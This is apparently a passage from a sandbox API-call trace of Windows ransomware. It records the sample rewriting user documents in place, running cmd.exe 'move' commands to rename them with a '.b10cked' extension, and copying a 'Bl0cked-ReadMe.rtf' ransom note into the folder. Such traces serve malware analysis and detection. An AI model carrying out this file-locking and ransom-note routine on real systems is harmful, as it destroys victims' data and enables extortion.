lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xa168 [0233.488] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xa650 [0233.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xa650 [0233.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.490] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5327, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5327, lpOverlapped=0x0) returned 1 [0233.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.490] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5327, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5327, lpOverlapped=0x0) returned 1 [0233.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-21287, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5329 [0233.490] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5327, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5327, lpOverlapped=0x0) returned 1 [0233.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-21287, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5329 [0233.490] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5327, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5327, lpOverlapped=0x0) returned 1 [0233.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ieMCxg.pps", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0233.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ieMCxg.pps", cchWideChar=10, lpMultiByteStr=0x131324c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ieMCxg.pps", lpUsedDefaultChar=0x0) returned 10 [0233.495] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xa650 [0233.495] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.495] CloseHandle (hObject=0x1b4) returned 1 [0233.496] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\ieMCxg.pps", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps") returned 0x3d [0233.496] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0233.497] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x990, dwThreadId=0xa60)) returned 1 [0233.498] CloseHandle (hObject=0x120) returned 1 [0233.498] CloseHandle (hObject=0x1b4) returned 1 [0233.498] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0233.498] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0233.498] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount2=51) returned 3 [0233.498] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0233.499] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0233.499] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0233.499] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0233.499] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0233.499] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0233.499] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0233.500] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0233.500] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0233.500] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x8f0, dwThreadId=0xad8)) returned 1 [0233.531] CloseHandle (hObject=0x120) returned 1 [0233.531] CloseHandle (hObject=0x1b4) returned 1 [0233.531] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\bl0cked-readme.rtf")) returned 0x20 [0233.531] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0233.531] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0233.531] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0233.531] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.532] ReleaseMutex (hMutex=0xf8) returned 1 [0233.532] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.532] ReleaseMutex (hMutex=0xf8) returned 1 [0233.532] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.532] ReleaseMutex (hMutex=0xf8) returned 1 [0233.532] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.532] ReleaseMutex (hMutex=0xf8) returned 1 [0233.532] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\aK_FOd5jl.ots" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\ak_fod5jl.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.532] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29032122958) returned 1 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16db7 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x168cf [0233.533] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16db7 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16db7 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.534] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xb6da, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xb6da, lpOverlapped=0x0) returned 1 [0233.535] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.535] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xb6da, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xb6da, lpOverlapped=0x0) returned 1 [0233.535] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-46810, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6dd [0233.535] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xb6da, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xb6da, lpOverlapped=0x0) returned 1 [0233.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-46810, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6dd [0233.536] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xb6da, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xb6da, lpOverlapped=0x0) returned 1 [0233.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="aK_FOd5jl.ots", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0233.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="aK_FOd5jl.ots", cchWideChar=13, lpMultiByteStr=0x131322c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aK_FOd5jl.ots", 